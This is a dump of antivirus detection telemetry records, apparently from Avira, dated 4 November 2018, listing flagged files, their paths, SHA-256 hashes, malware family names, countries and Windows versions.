  Row(detection=Row(filename='avscan-20181104-150950-b8f9a6b2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2b316d9b\\AVSCAN-20181104-145604-28DEF0E8\\AVSCAN-20181104-150950-B8F9A6B2', filesize=768000, name='WORM/Pimybot.JA.1.#M1.#R1'), hash='5642847f2a431c9c5852b1e5ebe606f11acd628c251cc8d30f75beadc612518d', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:09:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-171553-7f4e5686', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e28951c1\\AVSCAN-20181104-170735-27CB4304\\AVSCAN-20181104-171553-7F4E5686', filesize=768000, name='WORM/Pimybot.JA.1.#M1.#R1'), hash='5642847f2a431c9c5852b1e5ebe606f11acd628c251cc8d30f75beadc612518d', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:15:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-150303-71e9dbba', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2b316d9b\\AVSCAN-20181104-145604-28DEF0E8\\AVSCAN-20181104-150303-71E9DBBA', filesize=768000, name='WORM/Pimybot.JA.1.#M1.#R1'), hash='5642847f2a431c9c5852b1e5ebe606f11acd628c251cc8d30f75beadc612518d', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:03:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-150708-9cd35401', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2b316d9b\\AVSCAN-20181104-145604-28DEF0E8\\AVSCAN-20181104-150708-9CD35401', filesize=768000, name='WORM/Pimybot.JA.1.#M1.#R1'), hash='5642847f2a431c9c5852b1e5ebe606f11acd628c251cc8d30f75beadc612518d', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:07:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-172023-ae77907c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e28951c1\\AVSCAN-20181104-170735-27CB4304\\AVSCAN-20181104-172023-AE77907C', filesize=768000, name='WORM/Pimybot.JA.1.#M1.#R1'), hash='5642847f2a431c9c5852b1e5ebe606f11acd628c251cc8d30f75beadc612518d', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:20:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='kpzstool.exe', filepath='D:\\KOPLAYER\\Tools\\kpzstool.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='564dafb8421739ef9ff8904e023dfed21509d3bba9d719953e124740cb51ed71', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Roaming\\regsvr.exe', parentsize=1136128, timestamp='2018-11-04T06:36:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-212541-6416c573', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_01434177\\AVSCAN-20181104-210731-0BCFB3D0\\AVSCAN-20181104-212541-6416C573', filesize=1280000, name='Adware/FileTour.mzyvw.#M1.#R1'), hash='564ede05ee9f2dd1f883ec900cc98e114f7f3a9adc85272216a785d2ce00339b', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:25:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wmlaunch.exe', filepath='C:\\Windows\\winsxs\\x86_microsoft-windows-mediaplayer-autoplay_31bf3856ad364e35_6.1.7600.16385_none_1ad106c1a14e554e\\wmlaunch.exe', filesize=256000, name='W32/Virut.Gen.#M1.#R1'), hash='56dc7cfbdceec53580626ebe40519699c3c88ab27ad9f82a93d974fa1a0ff56e', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:12:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='recycler.exe', filepath='E:\\RECYCLER_DETEC\\RECYCLER.exe', filesize=64000, name='WORM/VB.FU.27.#M1.#R1'), hash='56e331b651330979b1d89d722845de80338370b528afebb54e855d4bca2d6f65', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-04T09:36:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='s-5-3-42-2819952290-8240758988-879315005-3665.exe', filepath='E:\\RECYCLER_DETEC\\S-5-3-42-2819952290-8240758988-879315005-3665\\S-5-3-42-2819952290-8240758988-879315005-3665.exe', filesize=64000, name='WORM/VB.FU.27.#M1.#R1'), hash='56e331b651330979b1d89d722845de80338370b528afebb54e855d4bca2d6f65', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-04T09:36:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-163825-a8108604', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9a15e736\\AVSCAN-20181104-163712-A14B6B69\\AVSCAN-20181104-163825-A8108604', filesize=64000, name='WORM/VB.FU.27.#M1.#R1'), hash='56e331b651330979b1d89d722845de80338370b528afebb54e855d4bca2d6f65', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T09:38:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-163843-a9b4307f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9a15e736\\AVSCAN-20181104-163712-A14B6B69\\AVSCAN-20181104-163843-A9B4307F', filesize=64000, name='WORM/VB.FU.27.#M1.#R1'), hash='56e331b651330979b1d89d722845de80338370b528afebb54e855d4bca2d6f65', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T09:38:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-163854-aabb65a7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9a15e736\\AVSCAN-20181104-163712-A14B6B69\\AVSCAN-20181104-163854-AABB65A7', filesize=64000, name='WORM/VB.FU.27.#M1.#R1'), hash='56e331b651330979b1d89d722845de80338370b528afebb54e855d4bca2d6f65', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T09:38:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0003c9c9', filepath='C:\\Windows\\Temp\\2506595e-9777-4d59-b538-5440db77ee06\\tmp00003411\\tmp0003c9c9', filesize=1536000, name='TR/CoinMiner.CN.#M1.#R1'), hash='57353df34d61ae3e8855e6f3f725aaf2fcc9609fddffd2abedaddd3d0695c56b', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.4.942.11595\\AdAwareService.exe', parentsize=542896, timestamp='2018-11-04T09:12:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0003cc8c', filepath='C:\\Windows\\Temp\\2506595e-9777-4d59-b538-5440db77ee06\\tmp00003411\\tmp0003cc8c', filesize=1536000, name='TR/CoinMiner.CN.#M1.#R1'), hash='57353df34d61ae3e8855e6f3f725aaf2fcc9609fddffd2abedaddd3d0695c56b', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.4.942.11595\\AdAwareService.exe', parentsize=542896, timestamp='2018-11-04T09:14:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/CoinMiner.CN.#M1.#R1'), hash='57353df34d61ae3e8855e6f3f725aaf2fcc9609fddffd2abedaddd3d0695c56b', metadata=Row(cmdline=None, country='HU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2613248, timestamp='2018-11-04T15:12:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='vcredist_x64.exe', filepath='D:\\PLAQUINHAS DIVERTIDAS\\PROGRAMAS\\COREL X8\\CorelDraw Graphics Suite X8 Multilanguage 32 e 64 Bits\\CorelDRAW X8 32 e 64\\x64\\Redist\\VC\\vcredist_x64.exe', filesize=384000, name='W32/Stanit.#M1.#R1'), hash='5741a738e203397947f6519bda85271e18dab035aaef1750bcca6a7fd9eb93d7', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T04:28:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='f_0011cc', filepath='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_0011cc', filesize=280000, name='PUA/CryptoMiner.Gen.#M1.#R1'), hash='57db57b70209fd9e5ab85e37d76c546658a428b264b8062f4186e517aa95cbf2', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\Application\\chrome.exe', parentsize=1426264, timestamp='2018-11-04T20:42:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='audiodg.exe', filepath='C:\\Windows\\System32\\audiodg.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='57fd5e156e5ab649ffd1a645a2d0171e353e057050f1ea07d8fe511f62779058', metadata=Row(cmdline=None, country='MA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:45:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ws1a9193826455f5ff-6ab24494123382a9c4b-5908.htm', filepath='\\\\?\\D:\\Autodesk\\AutoCAD Structural Detailing 2012 - English\\Help\\filesACR\\WS1a9193826455f5ff-6ab24494123382a9c4b-5908.htm', filesize=244000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='585bf41ffecb6780a4f47d573d3dcaae445a73edab641685cf625408ab33e7a3', metadata=Row(cmdline=None, country='IQ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:50:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='c9ab56a9ee3319dc8fa44e4556a087a5d357960d', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\c9ab56a9ee3319dc8fa44e4556a087a5d357960d', filesize=320000, name='Adware/DealPly.58c809.#M1.#R1'), hash='58c809d5d4d2e350c3695e7f58dba4a857d5749f4f2797623532b7246208e54a', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T18:25:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='bestellung_632351_28_11_2017.doc', filepath='C:\\Users\\X\\AppData\\Local\\IM\\Identities\\{22355ACC-DC05-4C99-BABC-FB5A45E577B4}\\Message Store\\Messages\\1\\{4AA0D800-2AD4-4E96-87F6-F9BE70260ED8}\\Attachments\\Bestellung_632351_28_11_2017.doc', filesize=192000, name='W97M/Agent.6440813.#M1.#R1'), hash='58cadddebc97fa1af22e6f7e7ea1a4044e0832a3602d6017dbf8f0eef70049a4', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IncrediMail\\Bin\\IncMail.exe', parentsize=444424, timestamp='2018-11-04T15:13:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wedownload manager-buttonutil64.dll', filepath='C:\\Program Files (x86)\\weDownload Manager\\weDownload Manager-buttonutil64.dll', filesize=512000, name='ADWARE/CrossRider.Gen2.#M300.#R101244'), hash='5964c9b107a98dfcb2a486d0c9c30b4e31dab145a7186602e56bef2557340045', metadata=Row(cmdline='invagent.dll,RunUpdate -noappraiser', country='HK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-04T08:10:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='instdemo.exe', filepath='C:\\Program Files\\Lenovo\\FastBoot\\InstDemo.exe', filesize=384000, name='W32/Jeefo.A.#M1.#R1'), hash='596d0718432fc89852f4b142871a8680138a4964e4de55a01d151d4435d908bc', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:tFCmOKIR3UWKR8O+.1', country='TH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T02:29:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='2fa3db0f40edfde3070b39ad7f99874cb5b77153', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\2fa3db0f40edfde3070b39ad7f99874cb5b77153', filesize=320000, name='ADWARE/DealPly.Gen.#M1.#R1'), hash='599897f56ebfe0b8d2a8f34e5adee9b6b61e87111a664fd2c5e42e211cf3f21a', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T18:46:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-233619-6eda5d94', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ca0cc13b\\AVSCAN-20181104-233438-5C08BF96\\AVSCAN-20181104-233619-6EDA5D94', filesize=320000, name='HEUR/AGEN.1015984.#M1.#R1'), hash='59c825e3e530f177f11965667c14361d385dfd53ae02730bd73b1c63e29bde59', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:36:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='project rubby 2.983.exe', filepath='C:\\Users\\X\\Music\\Project RuBBy 2.983.exe', filesize=320000, name='HEUR/AGEN.1015984.#M1.#R1'), hash='59c825e3e530f177f11965667c14361d385dfd53ae02730bd73b1c63e29bde59', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-04T14:34:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='project rubby 2.983.exe', filepath='C:\\Users\\X\\Music\\Project RuBBy 2.983.exe', filesize=320000, name='HEUR/AGEN.1015984.#M1.#R1'), hash='59c825e3e530f177f11965667c14361d385dfd53ae02730bd73b1c63e29bde59', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-04T14:34:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-220020-3ec9bde5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ca0cc13b\\AVSCAN-20181104-215848-2DAFFB5E\\AVSCAN-20181104-220020-3EC9BDE5', filesize=320000, name='HEUR/AGEN.1015984.#M1.#R1'), hash='59c825e3e530f177f11965667c14361d385dfd53ae02730bd73b1c63e29bde59', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:01:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='project rubby 2.983 (1).exe', filepath='C:\\Users\\X\\Downloads\\Project RuBBy 2.983 (1).exe', filesize=320000, name='HEUR/AGEN.1015984.#M1.#R1'), hash='59c825e3e530f177f11965667c14361d385dfd53ae02730bd73b1c63e29bde59', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:56:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ppj2dd.exe', filepath='k:\\برنامج رامز واكل الجو\\العاب\\حرب عصابات\\PPJ2DD.EXE', filesize=1024000, name='TR/Patched.Gen.#M300.#R2947'), hash='5a592f53d779263e37fefffc068def3ca331c552d426db825e18b6b5d7c6b1c6', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T22:31:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='00003460.exe', filepath='\\\\?\\D:\\KDR\\exe\\00003460.exe', filesize=320000, name='TR/Crypt.XPACK.Gen.#M300.#R2936'), hash='5a5e12f66cb63556f0d2b9f4b0deaa85acb3cd0221bfcc1067123124d9a5e9e5', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:43:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='devcon.exe', filepath='C:\\Program Files\\PowerISO\\devcon.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='5b3815d5e22a56239c63a08587d4acebae5e9ce21ae671295d9f0a79a810cca0', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:uLrF\\\\\\/V74hEqT\\\\\\/ePJ.1', country='ES', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=122560, timestamp='2018-11-04T03:08:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ehshell.exe', filepath='C:\\Windows\\ehome\\ehshell.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='5b3b718d72399ebaec59ad04a04d767bf96c5e9016fde51295d193c32d1fb1be', metadata=Row(cmdline='-k netsvcs', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T13:46:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0003412.exe', filepath='f:\\system volume information\\_restore{c479216e-5d38-4428-b4db-e28930c85d49}\\rp8\\A0003412.exe', filesize=512000, name='W32/Virut.Gen.#M1.#R1'), hash='5bfea8426f1417a143c363847a360a7a013be23c4aaa1c9474e08b3af11d35bd', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:29:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-141136-08746a28', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6125d533\\AVSCAN-20181104-135312-59F9F13F\\AVSCAN-20181104-141136-08746A28', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='5c45b0e717ec785818796cccd5ef52705bb98997101d8a414549f1e98a907441', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T08:41:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='qmixer.dll', filepath='g:\\files\\العاب\\لعبة كراش عربيات\\direct3d\\QMIXER.DLL', filesize=256000, name='W32/Ramnit.CD.#M1.#R1'), hash='5d38e295bd8f6629e23ca9ef1db41726911b0e4bdd7dd177c7616f34ecba51a2', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:34:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-220008-9d2d2024', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_77e93ea4\\AVSCAN-20181104-214501-F9E185C1\\AVSCAN-20181104-220008-9D2D2024', filesize=64000, name='TR/Siggen.rioid.#M1.#R1'), hash='5d45044066fc94a1558c3717b1bab84d8cfc17b7603b888168b9571f1b2b414e', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T15:00:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashmemorytoolkit.exe', filepath='\\\\10.255.111.86\\d$\\12.Hiren.s.Boot.CD.15.2\\HBCD\\Programs\\FlashMemoryToolkit.exe', filesize=64000, name='TR/Siggen.rioid.#M1.#R1'), hash='5d45044066fc94a1558c3717b1bab84d8cfc17b7603b888168b9571f1b2b414e', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-04T06:22:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0001553.exe', filepath='\\\\?\\J:\\System Volume Information\\_restore{66011086-CE33-4617-A019-7C17F0FCBE6A}\\RP3\\A0001553.exe', filesize=128000, name='HEUR/AGEN.1008649.#M1.#R1'), hash='5d4ca5b7ae64fb9fe18b4c2d74d0b13dd4c85003f1d46f9707660666f4bc728d', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T06:55:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='5e4b1c51a31cd5d70a98e1324832fd1164f725970f2dccd59429297f766757e5', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-04T12:00:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='temp3.exe', filepath='\\\\?\\I:\\Ghost\\Fannan NewLook 6 Fin\\Software\\Fannan-Software\\Software\\docs\\Others\\Temp3.exe', filesize=192000, name='HEUR/APC.#M1.#R1'), hash='5e4d448f384d475a4fd6b5b24881132ba5536235593918181a53cf1fd5910ec0', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T21:44:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-121054-0d41f678', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2615e84a\\AVSCAN-20181104-120343-D12656CE\\AVSCAN-20181104-121054-0D41F678', filesize=684000, name='PUA/GetNow.Gen4.#M300.#R5796'), hash='5e8f43297d239481b1c34410ced26177b81648db206b48fba712dd0e88f672a5', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:11:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='belies.vir', filepath='\\\\?\\C:\\Program Files (x86)\\Obstructing\\belies.VIR', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='5edc60b559c72319c9df75f6a7250814d740868131db700d31574bd0d6be5180', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:21:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='cam.dll', filepath='\\\\?\\D:\\Pastas da Área de Trabalho\\BATOTA\\59330\\NjRat 0.7d Golden Edition\\Plugin\\cam.dll', filesize=64000, name='HEUR/AGEN.1032945.#M1.#R1'), hash='5f00cda5808e3fd126d452708308ddee6556cb83adaccd02efe83654a40fc641', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T23:49:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='gax.dll', filepath='\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3645892314-2022141175-574063286-1000\\$RCFQM95\\gax.dll', filesize=64000, name='HEUR/AGEN.1021032.#M1.#R1'), hash='5f23c9d33bff74c85144bae407e5f0374cc81855657f95fd5f5125a68e7ed64a', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T04:12:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='cryptbase.dll', filepath='\\\\?\\C:\\ProgramData\\L0OYMXAEWJUQIKV\\cryptbase.dll', filesize=864000, name='HEUR/AGEN.1023522.#M1.#R1'), hash='5f31782af7afcf068167713dc72243c1ae3ed8af6ebdf1416e432dff16b1dbbe', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T23:44:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-200105-b9caf191', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e4789539\\AVSCAN-20181104-194328-203F8B01\\AVSCAN-20181104-200105-B9CAF191', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T22:01:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-195626-91454562', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e4789539\\AVSCAN-20181104-194328-203F8B01\\AVSCAN-20181104-195626-91454562', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T21:56:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-215351-5e6bb6b6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_aa78dab4\\AVSCAN-20181104-215047-4793A06D\\AVSCAN-20181104-215351-5E6BB6B6', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T23:53:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-215304-589676e6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_aa78dab4\\AVSCAN-20181104-215047-4793A06D\\AVSCAN-20181104-215304-589676E6', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T23:53:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181103-231910-681cdb4b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_89e497ab\\AVSCAN-20181103-230631-1EB43BCA\\AVSCAN-20181103-231910-681CDB4B', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:42:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-125802-3d58cb64', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_613104b7\\AVSCAN-20181104-125452-2406B856\\AVSCAN-20181104-125802-3D58CB64', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:58:01Z'), dt=datetime.date(2018, 11, 4)),
